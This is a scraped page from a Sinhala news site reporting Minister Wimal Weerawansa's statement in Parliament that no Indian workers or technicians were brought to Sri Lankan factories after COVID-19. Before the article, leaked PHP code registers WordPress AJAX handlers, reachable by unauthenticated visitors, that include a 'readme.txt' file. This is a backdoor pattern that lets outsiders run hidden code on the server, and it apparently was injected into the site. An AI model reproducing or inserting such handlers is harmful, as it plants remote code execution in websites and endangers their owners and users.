if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } කොරෝනාවෙන් පසු මෙරට කිසිදු කර්මාන්තශාලාවකට ඉන්දියාවෙන් ශ්‍රමිකයන් ගෙන්වා නෑ..- විමල් - mediahumanrights.lk
mediahumanrights.lk
News Political

කොරෝනාවෙන් පසු මෙරට කිසිදු කර්මාන්තශාලාවකට ඉන්දියාවෙන් ශ්‍රමිකයන් ගෙන්වා නෑ..- විමල්

මෙරට කිසිදු කර්මාන්තශාලාවකට ඉන්දියාවේ හෝ වෙනත් කිසිදු රටක සිට කොවිඩ් 19 වසංගතයෙන් පසු ශ්‍රමිකයන් හෝ තාක්ෂණික ශිල්පීන් ගෙන්වා නැතැයි කර්මාන්ත අමාත්‍ය විමල් වීරවංශ මහතා පාර්ලිමේන්තුවේදී සඳහන් කළේය.

මෙරට පිහිටි කර්මාන්ත ශාලාවක තාක්ෂණික හෝ වෙනයම් කටයුත්තක් සඳහා විදේශිකයන් ගෙන්වයි නම් ආයෝජන මණ්ඩලයේ ලියාපදිංචි වූ කර්මාන්තශාලා එම මණ්ඩලයේ අනුමැතියද එසේ නොමැති කර්මාන්තශාලා සඳහා කර්මාන්ත අමාත්‍යංශයේ ද අනුමැතිය ලබා ගත යුතු බව අමාත්‍යවරයා පැහැදිලි කළේය.

ඇඟළුම් කර්මාන්තශාලා කොවිඩ් වසංගතය හමුවේ බරපතල ප්‍රශ්නයකට මුහුණු දී ඇති බවත් ඉන්දියාවේ සිට පැමිණි පිරිසක් මඟින් කොරෝනා වසංගතය නැවත පැතිර යාමක් සිදු වූවේදැයි පාර්ලිමේන්තු මන්ත්‍රී තුෂාර ඉඳුනිල් මහතා අසන ලද වාචික ප්‍රශ්නයකට පිළිතුරු දෙමින් අමාත්‍යවරයා මේ බව ප්‍රකාශ කළේය.

බ්‍රැන්ඩික්ස් ඇඟළුම් ආයතනය BOI යටතේ ලියාපදිංචි වූ සමාගමක් බවත් එය කර්මාන්ත අමාත්‍යංශයේ විෂය පථයට අයත් නොවන බවත් සඳහන් කළ අමාත්‍යවරයා; බ්‍රැන්ඩික්ස් ආයතනයට ඉන්දියානුවන් කිහිපදෙනෙක් පැමිණියේ යැයි කියන සිද්ධිය සම්බන්ධයෙන් තමා පෞද්ගලිකවම සොයා බැලූ බවත් කොවිඩ් 19 වසංගතයෙන් පසු කිසිම ඉන්දියානුවෙකුට ශ්‍රමිකයෙක් වශයෙන් හෝ තාක්ෂණික ශිල්පියෙක් වශයෙන් හෝ කිසියම් කර්මාන්ත ශාලාවක වුවමනාවක් සඳහා ලංකාවට රැගෙන ඒමට ඉල්ලීමක් කර නැති බවත් ඒ සඳහා කිසිදු අනුමැතියක් ලබා දී නොමැති බවත් අමාත්‍යවරයා අවධාරණය කළේය. ආයෝජන මණ්ඩලයේ සභාපතිවරයාගෙන් ද මේ පිළිබඳව විමසූ බවත් කිසිදු ඉන්දියානුවෙක් තාක්ෂණික හෝ වෙනත් කටයුත්තක් සඳහා ආයෝජන මණ්ඩලයේ ලියාපදිංචි කිසිදු ආයතනයකට පැමිණ නොමැති බව ආයෝජන මණ්ඩලයේ සභාපතිවරයා ද තහවුරු කළේයැයි අමාත්‍යවරයා පැවසීය. තවදුරටත් මේ පිළිබඳව සොයා බැලූ තමා ආගමන විගමන කාර්යංශයෙන් ද මේ පිළිබඳව තහවුරු කරගත් බව ද අමාත්‍යවරයා කීය.

අනුරුද්ධ බණ්ඩාර රණවාරණ
මාධ්‍ය ලේකම්
කර්මාන්ත අමාත්‍යාංශය
(under the courtesy of lankacnews.com news web)

Related posts

ත්‍රිකුණාමලයේ පුද්ගලයින් 75,000ක් ආරක්ෂිත ස්ථාන වෙත

Shiran Viraj

ක්‍රමවේදයේ වෙනසක් නිසා විශේෂ කාර්ය බලකායට ගැටලූ රැසක්?

Shiran Viraj

රුසියාවත් ලංකාව වගේ වෙයි.. කොරෝනා පාලනයට පුටින් හමුදාව කැදවයි..

Shiran Viraj